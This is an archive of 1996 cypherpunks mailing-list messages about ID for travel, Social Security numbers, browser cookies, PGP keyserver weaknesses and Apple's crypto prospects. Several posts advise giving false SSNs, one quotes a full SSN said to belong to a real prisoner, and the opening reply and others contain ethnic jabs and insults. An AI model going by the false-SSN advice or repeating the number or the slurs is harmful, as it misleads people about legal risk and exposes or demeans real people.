>So does anyone have any sort of "official" list as to what constitutes
>"government-issued photo-id"?  I'll be flying within California soon
>(see you at Crypto...), as as a "furriner", I have no US ID.  I do have
>photo-id issued by _another_ government, though (a health card; I wonder
>if they'll have heard of that...).
>
>   - Ian "I'd try to be sure to get to the airport early, but the plane
>            leaves at some ridiculous time like 7:30am"

As I recall, Ian, you are some kind of Damned Foreigner, a Canadian, and
possibly a Jew (from a name like "Goldberg"). As such, your Canuck
documents are worthless in these Beknighted States (at least until the
memory of the single person killed in Atlanta fades...Atlantans are worth
the lives of 100 lives of Third Worlders, which is why the single death in
Atlanta justifies this crackdown).

Perhaps if you coverted to either Southern Baptist or Mormon your stay here
would be easier.....


--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Tue, 6 Aug 1996 15:08:17 +0800
To: peter honeyman <honey@citi.umich.edu>
Subject: Re: Tolerance (fwd)
In-Reply-To: <199608051349.GAA22092@toad.com>
Message-ID: <Pine.SUN.3.91.960805200936.24298B-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Hmm... Perhaps my attorney went to Princeton as an undergrad. *shrug* I 
recall a Princeton diploma on his office wall.

Now, Peter, you're a moron, and I call you on it. 

-Declan


On Mon, 5 Aug 1996, peter honeyman wrote:

> Declan McCullagh writes:
> 
> > This is attempted proof by credentalism. I call him on it. 
> > 
> > Okay, Jim, what _do_ your lawyers say on this? Have you asked them? I,
> > too, have an attorney, a civil liberties specialist and a graduate from
> > Princeton law. So what? 
> 
> declan, you are a fucking liar, and i am calling you on it.  princeton does
> not have a law school.
> 
> 	peter
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 6 Aug 1996 11:49:34 +0800
To: Jamie Zawinski <cypherpunks@toad.com
Subject: Re: SSNs (was Re: Internal Passports)
Message-ID: <2.2.32.19960806010151.008f8f48@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:59 PM 8/5/96 -0700, Jamie Zawinski wrote:

>Well, it would be nice if it was that easy.  You (legally) need to give
>the correct one to anyone who has to make a report about you to the IRS,
>right?  Such as your employer.  

Virtually no one in the history of the world has done any time for giving a
false SS#.  Considering the fact that millions of Americans daily drive
drunk, exceed the lawful speed limit, drift through stop signs without
coming to a complete halt pick each other up in bars and do a host of other
things that are much more likely to get them in trouble than making up an
SS#, I am constantly *amazed* that people always advise you not to do so.

If it's good enough for the President of Israel, it's good enough for anyone.

>Is it
>needed to get a driver's license?  (The fine print on the DMV forms says
>"yes".)  

But most DMVs don't check and the SS is still resisting verification
services (at least until the Immigration Bill passes).

>Is it necessary to make use of employer-sponsored medical
>insurance?  (I suspect that the answer to this one is "no", except for
>the fact that when my employer set up my medical insurance they let the
>insurance company use my SSN as my insurance-related-ID-number.  But in
>any event, my dentist told me, "if you don't give it to us, they won't
>pay.")

Just make sure you give the insurance company and the doctor the same number.

>If you already have a SSN, can you get a *new* one in any legal way?
>(Sort of the same idea as changing your phone number to avoid
>telemarketing scum...)

The SS resists issuing new numbers in spite of widespread duplication and
theft.  Soon people will find themselves denied the right to work in this
country unless the SS reverses this reluctance.  If your SS# is stolen and
used "too many times"  in a future worker verification program, you're
screwed.  And there won't even be any welfare for you.

Use Alta Vista to find the SS Number FAQ.  There's more stuff.

DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 6 Aug 1996 11:47:25 +0800
To: jim bell <minow@apple.com>
Subject: Internet Economics
Message-ID: <2.2.32.19960806011555.00913cdc@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:22 PM 8/5/96 -0800, jim bell wrote:
>The current question is how to motivate individuals and companies to invest 
>in improvements to the Internet that will benefit everyone. However, I don't 
>think that will be the limiting factor that it may currently appear to be.  
>Due to the nature of the Internet, there is nothing to prevent a company 
>(such as AOL, Compuserve, or other) from building a shadow version of the 
>Internet, through which all of its customer's traffic will pass until it 
>emerges local to its destination.  

Note that this is the business model for @HOME which will be handling the
heavy lifting for various Internet Over Cable systems around the country.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gimonca@skypoint.com (Charles Gimon)
Date: Tue, 6 Aug 1996 14:22:57 +0800
To: cypherpunks@toad.com
Subject: Re: SSNs (was Re: Internal Passports) (fwd)
Message-ID: <m0unbyR-00002wC@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:
> Date: Mon, 05 Aug 1996 17:33:17 -0700
> From: jfricker@vertexgroup.com (John F. Fricker)
> Subject: Re: SSNs (was Re: Internal Passports)
> 

Before this gets too out of hand, I'm going to mention that Chris
Hibbert's Social Security Number FAQ (posted regularly to several
newsgroups, including news.answers) is superb. Great job of
separating legitimate paranoia from old wives' tales. Check for it
in Usenet or your favorite search engine.

Remember--privacy is your own responsibility.

> At 12:59 PM 8/5/96 -0700, you wrote:
> >Black Unicorn wrote:
> >> 
> >[ ...random losers asking for your SSN... ]
> >> > I was horrified and gave a random number.
> >> 
> >> You should always be horrified, and always give a random number.
> >
> >Well, it would be nice if it was that easy.  You (legally) need to give
> >the correct one to anyone who has to make a report about you to the IRS,
> >right?  Such as your employer.  But it's not always clear who else needs
> >it. 
> 
> Originally the 1939 ('37?) Social Security Act explicitly stated that the
> SSN could not be used for anything except SSA matters. Times apparently have
> changed or perhaps it's just de facto legislation by complicity.
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Tue, 6 Aug 1996 14:55:56 +0800
To: cypherpunks@toad.com
Subject: Re: Internal Passports
In-Reply-To: <ae2bfb9809021004b448@[205.199.118.202]>
Message-ID: <199608060439.VAA25581@netcom22.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:

 > Predictably, I got e-mail threatening me with legal action
 > (ha!) and claiming me to be a racist.

 > I promise not to ask my potential employees for legal proof
 > of their right to work if the Feds and Sacramentans promise
 > not to make it a law that I check such things, and if the
 > laws are not written such that I am a felon for not asking
 > for such documents from a dark, dusky Mexican but not from a
 > blonde- or red-haired ubermensch.

Yet, when the laws are "improved" to apply to all equally, people
still bitch.

The producers of the geriatric porn film "Grandma Does Grandpa",
and the popular sequel, "Grandma Does Grandpa II", must show at
the beginning of the film the address where the legally required
affidavits proving that Grandma and Grandpa are over 18 years of
age are available for inspection.

If they fail to do this, of course, they are child pornographers,
and may fork over many decades of their lives and hundreds of
thousands of their dollars towards the official government
crusade to protect our nation's youth from exploitation.

The fact that Grandma and Grandpa are obviously within mere
months of buying the farm does nothing to mitigate their offense,
should they decide that the law is not worth bothering with.

"What are you in for?"

"Child Porn."

"How old were the kids?"

"In their mid 70s."

"Ewwwwwww.  That's sick man!  You're disgusting."

:)

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 6 Aug 1996 14:57:17 +0800
To: cypherpunks@toad.com
Subject: Re: SSNs (was Re: Internal Passports) (fwd)
Message-ID: <ae2c1c850b0210047075@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:34 AM 8/6/96, Charles Gimon wrote:
>Forwarded message:
>> Date: Mon, 05 Aug 1996 17:33:17 -0700
>> From: jfricker@vertexgroup.com (John F. Fricker)
>> Subject: Re: SSNs (was Re: Internal Passports)
>>
>
>Before this gets too out of hand, I'm going to mention that Chris
>Hibbert's Social Security Number FAQ (posted regularly to several
>newsgroups, including news.answers) is superb. Great job of
>separating legitimate paranoia from old wives' tales. Check for it
>in Usenet or your favorite search engine.

I _know_, Chris Hibbert. Chris Hibbert is a _friend_ of mine. And this is
not just old wives' tales.

(w apologies to the Texas senator)

--Tim

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Tue, 6 Aug 1996 14:59:15 +0800
To: cypherpunks@toad.com
Subject: Re: Internal Passports
Message-ID: <2.2.32.19960806044723.01073e4c@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:37 PM 8/5/96 -0700, you wrote:
>At 1:01 AM 8/6/96, Duncan Frissell wrote:
>
>>The SS resists issuing new numbers in spite of widespread duplication and
>>theft.  Soon people will find themselves denied the right to work in this
>>country unless the SS reverses this reluctance.  If your SS# is stolen and
>>used "too many times"  in a future worker verification program, you're
>>screwed.  And there won't even be any welfare for you.
>>
>>Use Alta Vista to find the SS Number FAQ.  There's more stuff.
>
>BTW, I attempted to comply with the law in a recent request posted to
>ba.jobs.offered and scruz.general: I solicited workers for some brush
>clearing on my place, but advised them to only apply if--appearing to be
>Hispanic, Latin, Mexican, or otherwise unOfficial--they provided proof of
>their legal ability to work for me.
>


Hmmm. Actually a long time ago I lost my job with Greenpeace out of refusal
to sign an I-9 which was in '86 the Department of Justice's form to exhibit
eligibility to work in the US. The form required that I present two pieces
of photo identification or a driver's license to be authenticated by my
employer. Maybe it's a CA state law that adds an additional skin tone
criterium to for the filing of an I-9.

--j





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zach Babayco <zachb@netcom.com>
Date: Tue, 6 Aug 1996 15:11:17 +0800
To: Zero Cool <rvincent@cnmnet.com>
Subject: Re: viruss'
In-Reply-To: <3205B2F7.7E74@cnmnet.com>
Message-ID: <Pine.3.89.9608052107.A27020-0100000@netcom22>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 5 Aug 1996, Zero Cool wrote:

> Does anyone know where thre is  good virus page????
> I know that there is one out there, but dont have the add.
> Zero Cool
> 
Do a web search for the word VIRUS and try posting this somewhere else - 
this isn't a virus newsgroup, last time I checked.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@ACM.ORG>
Date: Tue, 6 Aug 1996 15:37:05 +0800
To: cypherpunks@toad.com
Subject: Re: SSNs (was Re: Internal Passports)
In-Reply-To: <Pine.SUN.3.91.960805234946.753F-100000@tipper.oit.unc.edu>
Message-ID: <199608060523.WAA04715@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



Simon Spero <ses@tipper.oit.unc.edu> writes:
>one silly thought: lots of people use cypherpunks as the username and 
>password for all those websites that want an id. What about a cypherpunks 
>3-2-4 number for those cases where an SSN isn't appropriate. Anyone know 
>what J. Edgar Hoover's SSN was?

Yes, that does indeed sound silly.  BTW, the UNABOMer's secret ID number,
used to identify various communications with the NYT as being his, is
reported (Mad Genius and a government deposition) to be 553-25-4394, which
allegedly turned out to be the SSN of a prisoner somewhere in California.
I suppose it's not useful for this application, since it belongs to
somebody who might need it again sometime.

	Jim Gillogly
	14 Wedmath S.R. 1996, 05:21




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas R. Floyd" <dfloyd@IO.COM>
Date: Tue, 6 Aug 1996 14:00:40 +0800
To: aeisenb@duke.poly.edu (Anne Eisenberg)
Subject: Re: Cookies on Microsoft Explorer?
In-Reply-To: <Pine.SUN.3.93.960805154442.12332B-100000@duke.poly.edu>
Message-ID: <199608060328.WAA07633@pentagon.io.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> Does anyone know what the equivalent technology is on Microsoft to
> Netscape's cookie technology?  Does Microsoft have support for cookies or 
> not?  
> 
> All of the discussion on the list to do with
> cookies is related to Netscape.  Does this mean that if one switches to
> Microsoft Explorer one can avoid the problem?  Many thanks.

MSIE supports cookies.

> 
> Anne Eisenberg
> aeisenb@duke.poly.edu
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Anonymous MacDonald <remailer@cypherpunks.ca>
Date: Tue, 6 Aug 1996 16:16:43 +0800
To: cypherpunks@toad.com
Subject: PGP public key servers are NOT useful!
In-Reply-To: <199608052141.QAA15347@bluestem.prairienet.org>
Message-ID: <199608060552.WAA04209@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


"David E. Smith" <dsmith@prairienet.org> writes:
> Over the last couple of weeks, I've noticed a lot
> of subscribers who PGP clearsign their messages,
> but who haven't uploaded their keys to any of
> the public keyservers.
> 
> Those keys are most useful when they're
> available to people who might want to use them,
> so I'm asking those of you who haven't sent
> them to a keyserver to do so.

I, for one, make it a point of never using the PGP public key servers.
I make my key available by finger, and always check for people's keys
through finger.  The problem with the PGP public key servers is that
one has absolutely no control over what gets uploaded there in one's
own name.

If someone really wanted to prevent me from using PGP, for example,
that person could just upload 500 different PGP keys to the key
servers all with my E-mail address as the key ID.  Even if you already
have a PGP key of someone you trust who has certified my key, are you
really going to verify all 500 other keys until you find the one that
is certified by the real trusted person?

Moreover, what's to stop someone from downloading my key, adding an ID
"kkk grand wizard", signing it with a fake "David Duke" key, and
uploading the new signature to the PGP servers.  I don't want anyone
to be able to put such things on my PGP key in the place where most
people will go looking for it first.

Deleting a key from a PGP key server is probably even more difficult
than getting an error corrected on your credit report.  Even if one
keyserver deletes it, it will probably end up propagating there again
from another server.

The finger approach is far from perfect, because not everyone can run
a finger daemon accessible to the net at large.  Moreover, even people
with PGP keys in their .plan files often can't be fingered at their
mail hubs (in fact, people often receive E-mail at addresses which are
only DNS "MX records" which don't have corresponding IP addresses).

Thus, I'm not saying finger is the solution.  However, at least people
have control over the plausible PGP key finger locations in a way that
fits sensibly with the key ID's sought.  In other words, if I have
absolutely no affiliation with Berkeley, I should not be able to stick
a PGP key with an ID ending "<..@cs.berkeley.edu>" where people will
primarily look for such keys.  (Of course I'm welcome put the key any
other place I have access to.)

Note finally that the key distribution problem addressed by the key
servers has nothing to do with key certification.  I think one of
PGP's greatest strenghts is that anyone can certify any one else's
public key.  I hate the idea of a hierarchical system where you might
have to pay $20 and wait 3 days to get a public key (Verasign I gather
does this for SSL certificates, though the cost/wait are probably
completely different).  Thus, while I'm advocating some kind of
hierarchical key distribution mechanism, I absolutely don't want to
see that kind of structure imposed on key certification.

In fact, the key distribution problem is just the opposite of key
certification in that one wants to prevent unwanted certificates and
keys from being interpreted as condoned by the supposed owner of the
PGP key.  Even if my key really was certified by someone a year ago,
if I've now forgotten the passphrase I don't want to keep having
people grab my old key.  I also don't want random attacks on my
character appended to my PGP key where most people will seek it.

Finally, for those who desire the "light security" of encrypting with
my PGP public key even though they can't verify any of the
certificates (and I do get plenty of such PGP-encrypted mail), it
might be nice to have a system in place that at least required an
active network attack to bypass.  You might argue that this would be
worse as it would encourage more people to use untrusted PGP keys.
However, consider SSH's mechanism whereby it acquires public keys
automatically at first and then keeps verifying the keys on subsequent
sessions.  It's not perfect, but I think it definitely improves the
security of the situation.  Anyway, if the NSA started mounting
massive active attacks from the internet backbones, we would at least
find out about it soon enough.

[Posted anonymously to prevent some wise guy from getting the
brilliant idea of uploading 500 fake PGP keys in my name...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 6 Aug 1996 16:44:03 +0800
To: Anne Eisenberg <aeisenb@duke.poly.edu>
Subject: Re: Cookies on Microsoft Explorer?
Message-ID: <2.2.32.19960806062542.00a47d1c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:48 PM 8/5/96 -0400, you wrote:
>
>Does anyone know what the equivalent technology is on Microsoft to
>Netscape's cookie technology?  Does Microsoft have support for cookies or 
>not?  

Internet exploder 3.0 supports cookies.

>All of the discussion on the list to do with
>cookies is related to Netscape.  Does this mean that if one switches to
>Microsoft Explorer one can avoid the problem?  Many thanks.

There is no escape.  Resistance is futile. You will be server pushed, filed,
tracked, counter digited, and numbered. You are not a free individual, you
are an IP address assigned from a dynamic pool.

Be seeing you!
---
|"Computers are Voodoo -- You just have to know where to stick the pins."|
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 6 Aug 1996 17:52:41 +0800
To: cypherpunks@toad.com
Subject: Re: e$: Watching the MacRubble Bounce
Message-ID: <ae2c29840d0210047e61@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


[Note: My analysis of Apple Computer, and why I will not give a "pep talk"
to certain Apple Macintosh folks, is contained at the _end_ of this piece.
Skip forward if you like, or read my response to Bob H. to get the
background on why I am posting this.]

At 4:20 AM 8/6/96, Robert Hettinga wrote:

[much stuff elided]

>All of which brings up the *real* point of this rant. I mean, who *cares* if
>you can do crypto on the Mac or not? Why not stand back and watch the
>MacRubble bounce?
>
>My thinking about all of this started because I've been reading Vinnie's
>mail over his shoulder. (Yes. I'm shameless. When we're working on stuff
>together, we trade our mail about it. As they say in the Mac biz, "Sosumi".)
>That is, Vinnie's been out there scaring up speakers for this shindig that
>he "borrowed" the grenades for, and, well, in his tree-shaking (God help you
>if Vinnie shakes a tree you're in), he invites (if you could call what
>Vinnie sent an invitation :-)) Yet *Another* Nameless Cypherpunk (YANC) to
>come and give us what we hope would be a Patented Colorful Cypherpunk
>crypto-Peptalk, with Vinnie saying to him (YANC), in effect, we need him
>(YANC) for a proper Laying-On of Hands, him being a Piece of the True Crypto
>Cross, and all.

I have to assume you are referring to me, as I had an exchange with Vinnie
which resembles this. As you were given "over the shoulder" access to mail
I sent to Vinnie, by all accounts, I certainly will have no qualms
forwarding my correspondence on this issue to this list.

>Of course, Vinnie didn't stand a chance.  If we *could* consider Vinnie for
>it, (which we can't, because he's on the selection committee) he might have
>earned the coveted 1996 Black Rhino "Mr. Kevlar" award (for courage in the

Oh, he "had a chance." He just wasn't very persuasive. And given that I
don' think crypto needs to be tied to the Macintosh platform (which is
dead, even though it hasn't yet topped over, and even though people like me
continue to use it), more is needed than "We need you." I'm not big on
charity, and Apple is truly a charity case.

>face of imaginary gunfire) for his efforts. Actually, considering the, heh,
>caliber, of last year's winner, it's just as well. A, uh, bang-up job Mr.
>Weinstein of Netscape did last year. A hard one to top. And so, the search
>continues. Both for this year's "Mr. Kevlar", and, of course, for some other
>Piece of the True Cross. Or so we think. I'll get to that in a moment.
>
>What Vinnie got from Yet Another Nameless Cypherpunk, instead of "Yes, I'll
>come talk about crypto, the universe, and everything.", was Yet Another
>Rendition of the Apple Macintosh Massacree. In six-part ;-) harmony, of
>course. And, no, I won't sing it here in its 21-minute (not even 17 for

Clever writing, to some, but empty of calories. My "Massacree" will be
included at the end of this message. Judge for yourself.

>radio) entirety. However, I should really note here that no matter how
>reasoned and cogent YANC's arguments were (and cogent they were, too: upon
>reading them, I was halfway to the dumpster with my trusty old PB180,
>tears in my eyes, before I came to my senses), in general, one of the *big*
>reasons that Vinnie got the $0$AD ($ame Old $ong And Dance) Re the Future of
>the Mac as a Viable Platform was probably more because the aforementioned
>YANC has eschewed speaking opportunities like this for years anyway, and
>Vinnie probably didn't ask him with the Proper Deference Necessary for a
>Cypherpunk of That Stature. In fact, I *know* Vinnie didn't, because I read
>his mail ;-). However, that, of course, wasn't why YANC gave Vinnie the
>aforementioned Massacree in particular.

Your future as a mind reader, Bob, is limited. It is true that I avoid some
speaking engagements which appear to be "hype" and "pep talks." But I also
have elected to give a few talks, incuding one in Monte Carlo which took me
several weeks to prepare for, and one at CFP '95, arranged by our own Prof.
Michael Froomkin.

>YANC Massacreed Vinnie because there's a lot of *very* disappointed Mac
>users out there, YANC being a prominent example thereof. Love the computer.
>Hate the company. Hell hath no fury like a Mac user (not to mention
>shareholder) scorned. Heck. I understand *that*. I did the *same* thing just
>over a year ago this week. "Platforms are Meat", and all that. For what it's
>worth, YANC, I *feel* your pain... :-).

I'm not sure what you're drinking, but you might want to lay off for a few
hours before sitting down to write.

>So, I repeat, why *not* stand back and let the MacRubble bounce? No, this is
>not a segue for me to stand up in my chair and start singing the Apple
>Company Song at the top of my lungs, complete with a QuickDraw-VR DOOM
>environment file of One Infinite Loop right up there on the screen for y'all
>to marvel at and play with using your very own Newtons, all while I sing 100
>Company Song verses with a six-part MIDI chorus of my own voice (Yechhh!).
>Nope. Not me. Indeed, I really *do* say, "Why not?". That is, let's look at
>what happens if people *don't* develop crypto for the Mac.
>
>The truth is folks, not much.

I agree. Not much to be done about Apple. Too bad, but it's not something I
can do much about. I've known some of the early Apple folks since 1977, and
first invested in them in 1984. (Though I sold 90% of my stock in Apple a
year or so ago, at $45, well above its current level.) In 1986, upon my
departure from Intel, I bought a Macintosh Plus, the closest thing I could
afford to a Symbolics 3600. (Interesting note: a friend of mine said she
just saw an ad for a Symbolics: $100 takes it away. Except for the
likelihood that it would cost far more per month to run it, I'd buy it.
Maybe I still will....) Then I bought a Mac IIci, a Powebook 100, a
Powerbook 170, and then a Power Macintosh 7100av. Mostly I've been happy,
as I had access to a windows environment (before Microsoft tried to patent
the name "windows"), visual metaphor (a la my Symbolics), and an adequate
supply of programs, including: Excel, Photoshop, Painter, Eudora, etc., all
of which made their appearance on Macs before on Windows.

However, the same windows/Lisp machine/Xerox/Smalltalk appearance which
Apple stole from the Xerox and MIT machines is now available in robust form
in the form of Windows NT machines, with huge market share and incredible
performance. (I am "loyal" to the computing metaphor, not to the current
market Apple has.)

>First of all, we all think it'll be Real Bad News for Apple Real Soon
>if real-live strong cryptography isn't shoved as far down as it's possible
>to make it go into the Mac's operating system, and right now, dammit. But,

As my message to Vinnie (below) points out, Apple blew a couple of chances
it has to incorporate crypto and security. For one, it announced some sort
of System 7 signature system...like a lot of Apple announcements, nothing
more was heard of it and it today merits not even the slightest footnote.
Second, Apple could've _owned_ the "Internet telephony" market which Intel
(!!!!!) is now touting so highly: Macintosh AC models (660av. 640av, all
PowerMacs) had extensive audio in/out capabilities, with DSP or CPU powers
sufficient to implement secure teleconferencing.

Instead, we got me-too  products like "E-World," a now-defunct proprietary
version of Prodigy, and countless other "detour" products, including
OpenTransport, GeoPort, speech recognition (which doesn't really work, at
least not on my $5K Mac), the Newton, and endless catchily-named Apple
products.


>so *what*? The Mac's only, say, 5-7% of the computer market anyway, and the
>only possibly new, cool, stuff Apple's involved in, say, OpenDoc/Cyberdog,
>has 5%, maybe 10%, of *that*, so, who *cares*? Potential Mac crypto
>developers aren't effecting that many people at *all*. They would better
>spend their time doing CryptoJava++ or something, because there's *much*
>more market penetration *there*. Or, even better, developers should go do
>CAPI for Windows. I mean, that's where the *real* money is, right? So
>fergadaboudit, go write CAPI-code, I mean, Microsoft Gets The Internet Now,
>right? At least there'll be *active* developer support from the MotherShip,
>which is better than whatcha get from Apple ferchrissakes <He said, ducking
>a mysteriously appearing grenade fusilade from Vinnie's general direction.
>Can someone tell me *how* he pulls the pins and throws them all at once
>like that?>.

Bob, your rants lose effect when mixed with this Hunter S. Thompsonesque
writing style (" <He said, ducking a mysteriously appearing grenade
fusilade ..."). Maybe this comes from too much time spent in front of a
Macintosh?

[much more stuff elided]

>That's why Vinnie's going to fill that room in Cupertino. (On the 5th and
>6th of September, remember?) First of all, the developers who are left in
>the Mac market are there because they love it. The old guys, who, like me,
>can't get it up anymore, still hack Macs because they love them. The *new*
>developers hack Macs because they can't get leave it *alone* and don't know
>from market share anyway. They just love what they're doing.

Well, if you "can't get it up anymore," to use your words, maybe it's time
for you to move on to something else?

>Well, it looks like Vinnie, and all those room-filling Chuck-E-Cheese-
>Gopher-Banging Mac crypto developers will have to use their ears (or what's
>between them, anyway) to fly instead.
>
>Only this time, Dumbo's got a sack of grenades.

Well, good luck. For me, giving a pep talk to a bunch of tired old Mac
developers at a Chuck-E-Cheese--especially when I went to the first one, in
San Jose, in 1977-78--does not excite me in the slightest. After all, it's
not as if Apple people cannot come to the Bay Area Cypherpunks meetings (I
know of only one current Apple employee on our mailing list, actively, or
who attends meetings: Martin Minow).

I refuse to accept any burden of guilt for not volunteering to speak for 30
minutes at a conference which is poorly-defined to me and which would cover
material the attendees could get by subscribing to our list for a few days
or weeks or by attending a physical Cypherpunks meeting in the Valley.

I'm sorry (for Vinnie, never for me) that  Vinnie is pissed off at me for
not helping out at his Let's Save Apple conference, and that Bob feels it
necessary to rant about this Mysterious Cypherpunk who won't Help the
Cause.

Life is tough. I'm available as a consultant, of course, and Apple is, as
always, free to hire me as a consultant.

Attached below is my major response to Vinnie. I would not have raised the
issue here on this list, except for Bob's post. Take it or leave it.

--Tim


At 9:52 PM 7/23/96, Vinnie Moscaritolo wrote:

>Cut the Bullshit, Tim;

I normally don't respond to anyone who tells me to "Cut the Bullshit,"
"Knock it off," etc. In fact, I deleted your message as soon as I saw
this....then a few minutes later I elected to retrieve it from Eudora's
trash folder before I had emptied the Trash.

I'll respond here, but not to "dammits" and "Knock it offs." If you want to
calmly discuss things, fine. Otherwise, I'll just add you to my filter
file. No harm done.


>I am having to pull teeth and do this a guerilla effort, but dammit If I
>have to do it alone I will. SO DONT GIVE ME THIS "I was not welcome on the
>list"  crap, what I am trying to avoid is folks like  dave weiner.  who
>just bitch and dont offer any solutions. Most of what you say IS EDUCATED
>and needs to be heard. Tim if you sent me a message saying you want to be
>on the list, I would stop what I was doing and put you on in a second..

I'm not surprised you are having trouble pulling this together, for several
good reasons:

1. Apple is struggling, developers are focussing on Windows.

2. Crypto for the Mac is really dependent on a couple of main apps: mail
programs (Eudora, Claris E-Mailer, Lotus Notes, etc.) and Web browsers
(obvious name here). If you want Apple to be "in the game" on crypto, as it
clearly is not now, ask Claris why they are not supporting PGP or S/MIME.

3. And crypto is not really a "Macintosh" issue. The best programs are now
platform-neutral.

4. A "guerilla" program, absent a compelling need, is likely to generate
little support.

5. "Internet commerce" is indeed a Big Issue (and of course a massively
hyped issue). But it is unlikely in the extreme that the Mac could ever be
a central player...the focus is on Web browsers and other tools that
represent 95% of what Web users have. (Don't tell me about CyberDog...less
than 10% of the market has Macs, and probably less than 10% of them have
installed CyberDog. I don't personally know any Mac users planning to use
it. This may change, of course, but at this point its prospects are not too
bright.)

My point is simple: if your conference is the effective realization of the
goals of your Mac-Crypto mailing list, as appears to be the case (at least
to me), then I can't see how my discussion of political issues would be
consistent with your insistence that Mac-Crypto avoid issues that don't
involve coding.

(And I would not welcome the attention I might get at Apple if I were to
discuss what I know of "information liberation," including the NuPrometheus
League.) Friends of mine have been called by P.I.s investigating this
case.)

>>No "solution" predominantly on the Mac is a solution for the masses, who
>>are overwhelmingly using Windows today. (You surely know this...your
>>company is struggling to hold 5-7% of the new sales figure; you haven't
>>been above 10% for several years.)
>>
>
>so why do YOU use a mac? or do you.

I use a Mac, primarily these days to run Netscape, Eudora Pro, and a
handful of related tools. None of these are Mac-specific anymore, and in
fact the Mac is way behind in a lot of ways (e.g., automatic signing of
messages).

The Mac has perhaps 8-10% of the installed base, and something less than
this in terms of new sales. Of this 10% (charitably), I doubt more than 10%
has installed and used "CyberDog." So, perhaps 1% of users have access to
this (at least at this time).

(I don't know the % of Web sites hosted on Macs, but I know the Mac is
coming under fire there, too. Lack of "multi-homing," lack of Unix-type
robustness, and the power of NT servers, from what I read. In any case, Web
site hosting is not a major point of confluence with crypto issues. I know
Sameer Parekh and folks like him would laugh if anyone suggested they host
their sites on a Mac.)

I've watched with growing incredulity and confusion as Apple has gone off
on tangents which seem to have little value to its core customers. Sure,
some of these have succeeeded (QuickTime for one), but many are just
tangents, at least for the dozen or so home Mac users I know. For example,
OpenTransport, GeoPort, Publish and Subscribe, OpenDoc, Interactive Music
Toolkit, the Speech recognition stuff, and so on. Not to mention expensive
detours into the Newton.

(I don't fault Apple for pursuing these things; it's hard to know what will
be the Next Big Thing and all. What I fault them for is having a confusing
array of add-ons to the basic OS, with lots of confusion about what the
advantages are. I, for example, use plain old System 7.1.2, an external
28.8 modem, and fairly standard apps and tools. I see no need for GeoPorts,
OpenTransport, or any of that stuff. And when Apple stopped bundling the
System software with machines, and making upgrades free, and generating
multiple versions of System 7.5x, well, this all made my glad to just sit
all this confusion out.)

Can Apple do anything to "help crypto"? Not a thing, as near as I can tell.
Eudora is _still_ not putting PGP or S/MIME in in Eudora Pro 3.0, and
Netscape is doing whatever it is doing (as you know). Thus, all I care
about is what Qualcomm does with Eudora and what Netscape does with
Navigator. I don't care about what Apple puts in CyberDog, as I have no
immediate plans to use it as my browser or my mailer. I think I represent
about 80% or more of all Macintosh users, too.

>>I just don't see the point of trying to educate Apple people on something
>>so far from what they need to be doing.
>>
>
>Point is put up or shut up, I am giving you a chance to be heard, I dont
>give a flying hoot what you say, except that you make people aware of the
>issues.  Tim dont you know that outside of cp very little is known about
>crypto-anarchy. and what it mean.. hey even if you hate the very essence of
>apple, (and I know your don't) you can helpbe part of the solution instead
